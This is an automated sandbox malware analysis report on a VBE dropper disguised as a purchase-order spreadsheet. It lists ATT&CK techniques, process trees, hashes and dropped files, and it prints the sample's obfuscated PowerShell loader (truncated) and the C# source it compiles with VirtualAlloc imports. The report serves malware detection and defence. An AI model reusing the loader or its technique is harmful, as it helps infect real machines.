Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter
Path Interception11
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts11
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
Scripting
LSA Secrets1
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Obfuscated Files or Information
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 755441 Sample: PO-08784 xlsx.vbe Startdate: 28/11/2022 Architecture: WINDOWS Score: 72 29 Malicious sample detected (through community Yara rule) 2->29 31 Sigma detected: Dot net compiler compiles file from suspicious location 2->31 33 Machine Learning detection for dropped file 2->33 8 wscript.exe 1 1 2->8         started        process3 signatures4 35 Wscript starts Powershell (via cmd or directly) 8->35 37 Obfuscated command line found 8->37 39 Very long command line found 8->39 11 powershell.exe 21 8->11         started        14 cmd.exe 1 8->14         started        process5 file6 27 C:\Users\user\AppData\...\bqup1euq.cmdline, Unicode 11->27 dropped 16 csc.exe 3 11->16         started        19 conhost.exe 11->19         started        21 conhost.exe 14->21         started        process7 file8 25 C:\Users\user\AppData\Local\...\bqup1euq.dll, PE32 16->25 dropped 23 cvtres.exe 1 16->23         started        process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO-08784 xlsx.vbe2%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.526784989.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://go.micropowershell.exe, 00000003.00000002.536819420.0000000005484000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://contoso.com/powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://contoso.com/Licensepowershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            No contacted IP infos
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:755441
            Start date and time:2022-11-28 17:57:24 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 58s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:PO-08784 xlsx.vbe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:16
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal72.expl.winVBE@11/9@0/0
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 28
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 5064 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            17:59:26API Interceptor28x Sleep call for process: powershell.exe modified
            No context
            No context
            No context
            No context
            No context
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:modified
            Size (bytes):8003
            Entropy (8bit):4.839308921501875
            Encrypted:false
            SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
            MD5:937C6E940577634844311E349BD4614D
            SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
            SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
            SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
            Malicious:false
            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 01:59:36 2022, 1st section name ".debug$S"
            Category:dropped
            Size (bytes):1332
            Entropy (8bit):3.9957433595008767
            Encrypted:false
            SSDEEP:24:HTzW9gaaIM5aHNhKPfII+ycuZhNaakSiPNnq92d:+aIMU7KPg1ulaa3uq9G
            MD5:1C80558DCC94D3FD4F7B17286D92DF42
            SHA1:F3681A06D954ACB58F4220D7B5254D932DCC76FB
            SHA-256:D72A354494ECF6C41CD3CCD149DBED680A12218A5F47DCAE1268F82FF0F0CBF1
            SHA-512:9BE0ED7915442AA737A5FEE290DA5A6C4B4FE194EAF53BFE6227642DEC95B30A9BA112B60BDC7D95419FF4DF362BCAD2D5D0036B9B3B979CEF128758798E3240
            Malicious:false
            Preview:L....g.c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP........................T........p..........7.......C:\Users\user\AppData\Local\Temp\RES47C6.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.q.u.p.1.e.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            File Type:MSVC .res
            Category:dropped
            Size (bytes):652
            Entropy (8bit):3.107923304203291
            Encrypted:false
            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqiPN5Dlq5J:+RI+ycuZhNaakSiPNnqX
            MD5:998B7FA2FFBE54BE98BEC5121AE6FE70
            SHA1:46F990AC5C9ADC468B57D96D57B88373DB496337
            SHA-256:AF3E64F5A6A5B28C61E346B2572EFEC45CCE288AA9AEF0F165DFB6074369A032
            SHA-512:2766D2A4C803489FB7D2E9034D551CD873E33507D1A2BADB241933261BE8F556AAE9223391653B3894FE1DD0C8E315D8636A5DFA3632E7FB8FBC31C9EED4BA57
            Malicious:false
            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.q.u.p.1.e.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.q.u.p.1.e.u.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators
            Category:dropped
            Size (bytes):1078
            Entropy (8bit):4.940853242499253
            Encrypted:false
            SSDEEP:24:JVSRTQ1BI7kKMy6k1Ahr0n8rsvJmsIpLnH:JV6TIBAXyuM08rsvJmsCLnH
            MD5:D697E139982C89FE5B0FD2410BE24D8A
            SHA1:A4436350800275EAB95B8C9FFF79C1A5AA3D5783
            SHA-256:7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
            SHA-512:8E1E55545B9B893D28FDF82C9A5122F35531CB3AB35A5C9CBA05FC52227BCD4F69513C07EE8EA2DEB02BC9F059116103228A9F7A480BEADA2FD153F937E3A726
            Malicious:false
            Preview:.using System;using System.Runtime.InteropServices;public static class Methyl1 {[DllImport("kernel32")]public static extern int GetThreadTimes(int Progr82,int Fremad,int Tele,int Tredi,int Tim);[DllImport("user32")]public static extern int ClientToScreen(int Inkorp,int tekno);[DllImport("kernel32")]public static extern int ExpandEnvironmentStrings(int Rotte,int Bul,int Ento);[DllImport("user32")]public static extern int EnumChildWindows(int Lithed,int Diobo,int Alung);[DllImport("winmm.dll")]public static extern int joySetCapture(int Kodif,int Vej,int Empti,int Reacti);[DllImport("kernel32")]public static extern void GlobalMemoryStatus(int Anlgsi);[DllImport("kernel32")]public static extern int IsValidCodePage(int Gaum);[DllImport("kernel32")]public static extern int HeapReAlloc(int Hand,int Fals,int Hung,int Under);[DllImport("gdi32")]public static extern int CreateSolidBrush(int For);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImpor
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
            Category:dropped
            Size (bytes):375
            Entropy (8bit):5.216906384863357
            Encrypted:false
            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fVYAYVzxs7+AEszIN723fVYAYQ:p37Lvkmb6K2agWZETad
            MD5:8D659EF1EB3A75D7370EB00129EEC3A8
            SHA1:EA3BD80A8CC1B6495A97CDA8F0A4E8FA0C9DD08E
            SHA-256:6D94C527B8C7BAD892E5DE2870056C9F5AE44ECCA51A1AF82EA02EB2DBD2FA20
            SHA-512:8B282C6BBBC0E20694DA40C14041927E5F20D8BE4133AE5D52AAC72D1802CA378C52A8EEE57D4D9E168BE580E5C8BB1D1BEE335DA84944927EBB530B368CD261
            Malicious:true
            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.0.cs"
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):4096
            Entropy (8bit):3.0590590133788105
            Encrypted:false
            SSDEEP:24:etGS4oL4q2fP+8cX7uAwOCTO7Ax+ilZeXaIXedLo1TtkF2A4NmWI+ycuZhNaakS7:67pwPNYcYLIeT+1F2A61ulaa3uq
            MD5:DF046D645321C882E947BA0D536D11B6
            SHA1:79D0A1689D20FF3139DCFEC21F8808E8F7C7B128
            SHA-256:77576BF5143A3AB3D2C287994FE49A0D5D0E64E7D6D06DF5870E00023E418725
            SHA-512:80AE7EA993BB2B846806AE3638D9CC71F5A98D3C42F11FF02DB96EFBDFA81F0EB3632AB1D67193F684554E7B01D1767DCE2AE3D1A102CEF85D8C274EA6F870E0
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g.c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.0.......#GUID...@...p...#Blob...........G.........%3............................................................/.(...................................................... 6............ E............ T............ m............ ~. .......... ..(.......... ..-.......... .. .......... ..-.......... .. .......... ..2...................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
            Category:modified
            Size (bytes):870
            Entropy (8bit):5.327046431108276
            Encrypted:false
            SSDEEP:24:Aqd3ka6K2ahETaYKaM5DqBVKVrdFAMBJTH:Aika6ChE+YKxDcVKdBJj
            MD5:DC0E7F90DE528663E8E504CF226E871C
            SHA1:34FC3D9AD0A1BE5FCDF3EFB42934B80C54946C00
            SHA-256:52F005C1E64201E649E456E32C44F11F2B27868A81027F3D1D735916FB3D5F94
            SHA-512:3885E2F8AA50C223B8BAFFED646C52A57251CD1D4EA5553AB34F26E7AE50A813F2F98C5B0A506E09A38B9CF5F33773DB378E2896732399FD7949F3B560ABFB05
            Malicious:false
            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):5.855492842209971
            TrID:
              File name:PO-08784 xlsx.vbe
              File size:352659
              MD5:266115592f966240c14dfeeec624bdf5
              SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
              SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
              SHA512:951e630a3faca243913ef3955fda178356ab1fbab1dc236c9ef6db096fc1c48b517bcce5b9964f72de213787aca6f9acdeb71fe669119f435088e2c9dcb47e7e
              SSDEEP:6144:JRYNxYchRj8pwdtWU4QfN+jWR4MvMsLYstdy2BxV72Q8qE+dRLzHb4HZIKK:jwhRjNtWU4vWRDvtEIy0xV7tNnRW6KK
              TLSH:D874AEB1993126244D0F130BAB861AC48CE937E71513232D5DABF78D2633F4F926E6D9
              File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
              Icon Hash:e8d69ece869a9ec4
              No network behavior found

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:17:58:24
              Start date:28/11/2022
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
              Imagebase:0x7ff7e7630000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:1
              Start time:17:58:26
              Start date:28/11/2022
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:CMD.EXE /c echo C:\Windows
              Imagebase:0x7ff7cb270000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:17:58:26
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:17:58:31
              Start date:28/11/2022
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi 